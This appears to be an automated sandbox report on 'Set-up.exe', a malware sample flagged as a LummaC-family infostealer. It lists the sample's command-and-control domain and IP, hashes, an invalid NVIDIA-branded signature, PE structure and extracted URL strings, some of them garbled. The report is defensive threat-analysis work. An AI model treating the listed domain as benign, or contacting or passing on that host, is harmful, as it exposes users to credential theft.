                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.hotmovs.com/'Set-up.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://passhudmrue.click/N'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ac.ecosia.org/autocomplete?q='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManife'Set-up.exefalse
                                                                                              high
                                                                                              http://crl.starfieldtech.com/repository/0'Set-up.exefalse
                                                                                                high
                                                                                                https://passhudmrue.click/44'Set-up.exe, 00000000.00000003.2301552831.0000000003756000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2301601874.0000000003759000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.tomabo.com/videos/dog-and-balls.mp4Please'Set-up.exefalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.tomabo.comVersion'Set-up.exefalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://passhudmrue.click/E'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.'Set-up.exefalse
                                                                                                    high
                                                                                                    http://www.symauth.com/rpa00'Set-up.exefalse
                                                                                                      high
                                                                                                      https://passhudmrue.click/apihF)'Set-up.exe, 00000000.00000003.2399629443.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2399646232.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id='Set-up.exefalse
                                                                                                          high
                                                                                                          https://passhudmrue.click/apiNp'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/Google'Set-up.exefalse
                                                                                                              high
                                                                                                              https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevar'Set-up.exefalse
                                                                                                                high
                                                                                                                https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutube'Set-up.exefalse
                                                                                                                  high
                                                                                                                  https://passhudmrue.click/0'Set-up.exe, 00000000.00000003.2387217571.0000000003754000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387007822.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387037149.0000000003753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-Idcontinuationclic'Set-up.exefalse
                                                                                                                    high
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    172.67.178.174
                                                                                                                    passhudmrue.clickUnited States
                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1584523
                                                                                                                    Start date and time:2025-01-05 18:52:23 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 5m 38s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:5
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:'Set-up.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                                                    EGA Information:Failed
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    • Number of executed functions: 0
                                                                                                                    • Number of non-executed functions: 2
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target 'Set-up.exe, PID 3940 because there are no executed function
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    TimeTypeDescription
                                                                                                                    12:53:28API Interceptor9x Sleep call for process: 'Set-up.exe modified
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    172.67.178.174E-dekont.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      No context
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUSsetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.163.221
                                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.32.1
                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.21.63
                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.208.58
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.90.109
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.196.191
                                                                                                                      momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      momo.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 1.1.1.1
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.178.174
                                                                                                                      No context
                                                                                                                      No created / dropped files found
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):0.7001271014505994
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                      • InstallShield setup (43055/19) 0.43%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:'Set-up.exe
                                                                                                                      File size:76'577'172 bytes
                                                                                                                      MD5:762266932c784bb2723293ad1cbecc37
                                                                                                                      SHA1:7983d7eda278567ba082c13b5690266212c447d4
                                                                                                                      SHA256:792474b38315e55d49a76f68e97b8a6b498ca794decc326cbaef5df22476c88d
                                                                                                                      SHA512:6862c10dbad70c356be44001f5f514a3f55b23e64aa4a2b89c6e49f1375bb83977bf8bf2398f4eb3f92fc0526968e9ff2e5021cff72725fcafef4351277838a3
                                                                                                                      SSDEEP:24576:iy3UVrqlCZuTti0JGBtlfvrVTPOk338FNR8olu6jF/3UDIBsS14tB1lzFlE675+E:L3UdqO4+OnXPPpBs1qg5lRCTk6A
                                                                                                                      TLSH:C7F77C1CFE0381F2C722F77089269EEDA9E45CC49F9287E7950939FA75225C74232939
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L>.."m.."m.."m.."m.."m...m.."m..)m.."m..(m.."mg.}m.."mj.,m.."m..#my."mj..m.."m..(m.."m..$m.."m..)mB."mRich.."m........PE..L..
                                                                                                                      Icon Hash:4dd933f06831b24d
                                                                                                                      Entrypoint:0x4ef5dc
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:
                                                                                                                      Time Stamp:0x676BB07E [Wed Dec 25 07:13:02 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:ff67bf11cc36c35722df0b7f1c459325
                                                                                                                      Signature Valid:false
                                                                                                                      Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                      Error Number:-2146869232
                                                                                                                      Not Before, Not After
                                                                                                                      • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                      Subject Chain
                                                                                                                      • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                      Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                      Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                      Serial:14781BC862E8DC503A559346F5DCC518
                                                                                                                      Instruction
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push FFFFFFFFh
                                                                                                                      push 0058B0F8h
                                                                                                                      push 004F5DC0h
                                                                                                                      mov eax, dword ptr fs:[00000000h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr fs:[00000000h], esp
                                                                                                                      sub esp, 58h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                                      call dword ptr [00575374h]
                                                                                                                      xor edx, edx
                                                                                                                      mov dl, ah
                                                                                                                      mov dword ptr [0064A114h], edx
                                                                                                                      mov ecx, eax
                                                                                                                      and ecx, 000000FFh
                                                                                                                      mov dword ptr [0064A110h], ecx
                                                                                                                      shl ecx, 08h
                                                                                                                      add ecx, edx
                                                                                                                      mov dword ptr [0064A10Ch], ecx
                                                                                                                      shr eax, 10h
                                                                                                                      mov dword ptr [0064A108h], eax
                                                                                                                      push 00000001h
                                                                                                                      call 00007F5F5D9AA0D6h
                                                                                                                      pop ecx
                                                                                                                      test eax, eax
                                                                                                                      jne 00007F5F5D9A39BAh
                                                                                                                      push 0000001Ch
                                                                                                                      call 00007F5F5D9A3A77h
                                                                                                                      pop ecx
                                                                                                                      call 00007F5F5D9A9DE1h
                                                                                                                      test eax, eax
                                                                                                                      jne 00007F5F5D9A39BAh
                                                                                                                      push 00000010h
                                                                                                                      call 00007F5F5D9A3A66h
                                                                                                                      pop ecx
                                                                                                                      xor esi, esi
                                                                                                                      mov dword ptr [ebp-04h], esi
                                                                                                                      call 00007F5F5D9A9C0Fh
                                                                                                                      call 00007F5F5D9A9B69h
                                                                                                                      mov dword ptr [0064DA54h], eax
                                                                                                                      call 00007F5F5D9A99F2h
                                                                                                                      mov dword ptr [0064A0F4h], eax
                                                                                                                      call 00007F5F5D9A97BFh
                                                                                                                      call 00007F5F5D9A9702h
                                                                                                                      call 00007F5F5D9A424Eh
                                                                                                                      mov dword ptr [ebp-30h], esi
                                                                                                                      lea eax, dword ptr [ebp-5Ch]
                                                                                                                      push eax
                                                                                                                      call dword ptr [005752DCh]
                                                                                                                      call 00007F5F5D9A96A6h
                                                                                                                      mov dword ptr [ebp-64h], eax
                                                                                                                      test byte ptr [ebp-30h], 00000001h
                                                                                                                      je 00007F5F5D9A39B8h
                                                                                                                      movzx eax, word ptr [ebp-2Ch]
                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                      • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1acec00x12c.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x24f0000xa4000.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x4903fd40x39c0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1750000x848.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x173bd80x174000c485b2605da69b4c1f096257f771d3b4False0.5095871135752689data6.682177361970691IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x1750000x3ac1e0x3b0007d90b567ca926b4c16bc3e8e715834a3False0.2986005362817797data4.777250629842978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x1b00000x9e5880x98000aa8a391fe0255a3eff2beea09b53776eFalse0.108978271484375data1.9379617641950813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x24f0000xa40000xa400047ac5187b878b23c2c6d4c8497a512efFalse0.39373779296875data6.269065678971354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_CURSOR0x2991900x134dataEnglishUnited States0.37337662337662336
                                                                                                                      RT_CURSOR0x2992e00x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.6298701298701299
                                                                                                                      RT_CURSOR0x2994300x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.5292207792207793
                                                                                                                      RT_CURSOR0x2995800x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.487012987012987
                                                                                                                      RT_CURSOR0x2996d00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                      RT_CURSOR0x2998080xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                      RT_BITMAP0x2691e00x4828Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 4379 x 4379 px/mEnglishUnited States0.055381117366825466
                                                                                                                      RT_BITMAP0x2750300x9c8Device independent bitmap graphic, 240 x 20 x 4, image size 2400EnglishUnited States0.06988817891373802
                                                                                                                      RT_BITMAP0x263c100x5128Device independent bitmap graphic, 216 x 24 x 32, image size 20736, resolution 18142 x 18142 px/mEnglishUnited States0.1476703889102811
                                                                                                                      RT_BITMAP0x2771080xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.29310344827586204
                                                                                                                      RT_BITMAP0x26dbe00x6c28Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/mEnglishUnited States0.05226090725223924
                                                                                                                      RT_BITMAP0x2759f80x628Device independent bitmap graphic, 32 x 12 x 32, image size 1536, resolution 226743 x 226743 px/mEnglishUnited States0.11294416243654823
                                                                                                                      RT_BITMAP0x2748080x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 18898 x 18898 px/mEnglishUnited States0.09434865900383142
                                                                                                                      RT_BITMAP0x268d380x4a8Device independent bitmap graphic, 24 x 12 x 32, image size 1152, resolution 18142 x 18142 px/mEnglishUnited States0.1610738255033557
                                                                                                                      RT_BITMAP0x2603c00x3028Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/mEnglishUnited States0.06878650227125244
                                                                                                                      RT_BITMAP0x26da080x1d8Device independent bitmap graphic, 12 x 12 x 24, image size 432EnglishUnited States0.13347457627118645
                                                                                                                      RT_BITMAP0x2633e80x828Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 91169 x 91169 px/mEnglishUnited States0.15373563218390804
                                                                                                                      RT_BITMAP0x276c480x2c8Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/mEnglishUnited States0.0800561797752809
                                                                                                                      RT_BITMAP0x276f100x1f8Device independent bitmap graphic, 80 x 10 x 4, image size 400EnglishUnited States0.31547619047619047
                                                                                                                      RT_BITMAP0x2771f00x9c8Device independent bitmap graphic, 28 x 22 x 32, image size 2464, resolution 2835 x 2835 px/mEnglishUnited States0.04033546325878594
                                                                                                                      RT_BITMAP0x28d4a80x1228Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/mEnglishUnited States0.08067986230636832
                                                                                                                      RT_BITMAP0x2760200xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/mEnglishUnited States0.17898457583547558
                                                                                                                      RT_BITMAP0x277bb80x3b8Device independent bitmap graphic, 12 x 19 x 32, image size 912, resolution 2835 x 2835 px/mEnglishUnited States0.13130252100840337
                                                                                                                      RT_BITMAP0x277f700x2b48Device independent bitmap graphic, 120 x 23 x 32, image size 11040, resolution 2835 x 2835 px/mEnglishUnited States0.032310469314079424
                                                                                                                      RT_BITMAP0x27aab80xc28Device independent bitmap graphic, 32 x 32 x 24, image size 3072EnglishUnited States0.046593830334190234
                                                                                                                      RT_BITMAP0x27b6e00x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.03667820069204152
                                                                                                                      RT_BITMAP0x27e4080x2d28Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/mEnglishUnited States0.01591695501730104
                                                                                                                      RT_BITMAP0x2811300x628Device independent bitmap graphic, 32 x 16 x 24, image size 1536, resolution 2835 x 2835 px/mEnglishUnited States0.15545685279187818
                                                                                                                      RT_BITMAP0x2817580x5128Device independent bitmap graphic, 144 x 48 x 24, image size 20736, resolution 2835 x 2835 px/mEnglishUnited States0.03176742395071236
                                                                                                                      RT_BITMAP0x2868800x6c28Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/mEnglishUnited States0.034563709910430514
                                                                                                                      RT_BITMAP0x28e6d00x48Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/mEnglishUnited States0.4166666666666667
                                                                                                                      RT_BITMAP0x28e7180xca8Device independent bitmap graphic, 80 x 10 x 32, image size 3200, resolution 2835 x 2835 px/mEnglishUnited States0.06419753086419754
                                                                                                                      RT_BITMAP0x28f3c00xc28Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/mEnglishUnited States0.17030848329048842
                                                                                                                      RT_BITMAP0x2998e80x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404EnglishUnited States0.34615384615384615
                                                                                                                      RT_BITMAP0x299fb80xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                                                                                                                      RT_BITMAP0x29a0700x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260EnglishUnited States0.28296703296703296
                                                                                                                      RT_BITMAP0x29a1e00x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                                                                                                                      RT_ICON0x2509800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0547945205479452
                                                                                                                      RT_ICON0x254ba80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.0979253112033195
                                                                                                                      RT_ICON0x2571500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.10553470919324578
                                                                                                                      RT_ICON0x2581f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.22340425531914893
                                                                                                                      RT_ICON0x2586a00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0547945205479452
                                                                                                                      RT_ICON0x25c8c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.0979253112033195
                                                                                                                      RT_ICON0x25ee700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.10553470919324578
                                                                                                                      RT_ICON0x25ff180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.22340425531914893
                                                                                                                      RT_MENU0x2900180x4f4dataEnglishUnited States0.3383280757097792
                                                                                                                      RT_MENU0x2905100xa36dataEnglishUnited States0.2620504973221117
                                                                                                                      RT_DIALOG0x2914c00x2c8dataEnglishUnited States0.5196629213483146
                                                                                                                      RT_DIALOG0x2947c80x4d0dataEnglishUnited States0.4074675324675325
                                                                                                                      RT_DIALOG0x2923180x290dataEnglishUnited States0.46646341463414637
                                                                                                                      RT_DIALOG0x2911700x34edataEnglishUnited States0.45271867612293143
                                                                                                                      RT_DIALOG0x291d900x582dataEnglishUnited States0.4049645390070922
                                                                                                                      RT_DIALOG0x2931c00x30edataEnglishUnited States0.4833759590792839
                                                                                                                      RT_DIALOG0x2938580x394dataEnglishUnited States0.4585152838427948
                                                                                                                      RT_DIALOG0x2925a80x542dataEnglishUnited States0.38781575037147104
                                                                                                                      RT_DIALOG0x2918a80x4e6dataEnglishUnited States0.386762360446571
                                                                                                                      RT_DIALOG0x2936f80x160dataEnglishUnited States0.625
                                                                                                                      RT_DIALOG0x292af00x19edataEnglishUnited States0.5942028985507246
                                                                                                                      RT_DIALOG0x295e680x316dataEnglishUnited States0.49746835443037973
                                                                                                                      RT_DIALOG0x292c900x418dataEnglishUnited States0.40553435114503816
                                                                                                                      RT_DIALOG0x2934d00x222dataEnglishUnited States0.5842490842490843
                                                                                                                      RT_DIALOG0x2942a00x528dataEnglishUnited States0.4287878787878788
                                                                                                                      RT_DIALOG0x2917880x11adataEnglishUnited States0.6453900709219859
                                                                                                                      RT_DIALOG0x290f800x1eadataEnglishUnited States0.6122448979591837
                                                                                                                      RT_DIALOG0x2930a80x112dataEnglishUnited States0.6423357664233577
                                                                                                                      RT_DIALOG0x293bf00x336dataEnglishUnited States0.4781021897810219
                                                                                                                      RT_DIALOG0x293f280x184dataEnglishUnited States0.5438144329896907
                                                                                                                      RT_DIALOG0x2940b00x1eedataEnglishUnited States0.5323886639676113
                                                                                                                      RT_DIALOG0x294c980x5a6dataEnglishUnited States0.39557399723374825
                                                                                                                      RT_DIALOG0x2952400x54adataEnglishUnited States0.39807976366322007
                                                                                                                      RT_DIALOG0x2957900x362dataEnglishUnited States0.4457274826789838
                                                                                                                      RT_DIALOG0x295af80x36adataEnglishUnited States0.43592677345537756
                                                                                                                      RT_DIALOG0x2961800x598dataEnglishUnited States0.4155027932960894
                                                                                                                      RT_DIALOG0x2967180x238dataEnglishUnited States0.4841549295774648
                                                                                                                      RT_DIALOG0x2969500x102dataEnglishUnited States0.6550387596899225
                                                                                                                      RT_DIALOG0x296a580x130dataEnglishUnited States0.625
                                                                                                                      RT_DIALOG0x296b880x1eedataEnglishUnited States0.5263157894736842
                                                                                                                      RT_DIALOG0x296d780x184dataEnglishUnited States0.5438144329896907
                                                                                                                      RT_DIALOG0x296f000x238dataEnglishUnited States0.4841549295774648
                                                                                                                      RT_DIALOG0x2971380x4d0dataEnglishUnited States0.4074675324675325
                                                                                                                      RT_DIALOG0x2976080x598dataEnglishUnited States0.4155027932960894
                                                                                                                      RT_DIALOG0x297ba00x418dataEnglishUnited States0.40553435114503816
                                                                                                                      RT_DIALOG0x299ed00xe8dataEnglishUnited States0.6336206896551724
                                                                                                                      RT_STRING0x29a3280xeadataEnglishUnited States0.38461538461538464
                                                                                                                      RT_STRING0x29a7700x1d2dataEnglishUnited States0.3605150214592275
                                                                                                                      RT_STRING0x29af000x1badataEnglishUnited States0.38009049773755654
                                                                                                                      RT_STRING0x29b2600x150Matlab v4 mat-file (little endian) E, numeric, rows 0, columns 0EnglishUnited States0.40476190476190477
                                                                                                                      RT_STRING0x29b3b00x1d8dataEnglishUnited States0.4279661016949153
                                                                                                                      RT_STRING0x29b0c00x19adataEnglishUnited States0.4170731707317073
                                                                                                                      RT_STRING0x29ac380x2c8dataEnglishUnited States0.3061797752808989
                                                                                                                      RT_STRING0x29b5880x56Matlab v4 mat-file (little endian) d, numeric, rows 0, columns 0EnglishUnited States0.6511627906976745
                                                                                                                      RT_STRING0x29a9480x2ecdataEnglishUnited States0.3048128342245989
                                                                                                                      RT_STRING0x29b5e00x1fcdataEnglishUnited States0.24803149606299213
                                                                                                                      RT_STRING0x29a7400x2cLotus unknown worksheet or configuration, revision 0x25EnglishUnited States0.4772727272727273
                                                                                                                      RT_STRING0x29a4180x46dataEnglishUnited States0.6571428571428571
                                                                                                                      RT_STRING0x29a4600xd8dataEnglishUnited States0.5601851851851852
                                                                                                                      RT_STRING0x29a5380x78dataEnglishUnited States0.5916666666666667
                                                                                                                      RT_STRING0x29a5b00x124dataEnglishUnited States0.4246575342465753
                                                                                                                      RT_STRING0x29a6d80x62dataEnglishUnited States0.6530612244897959
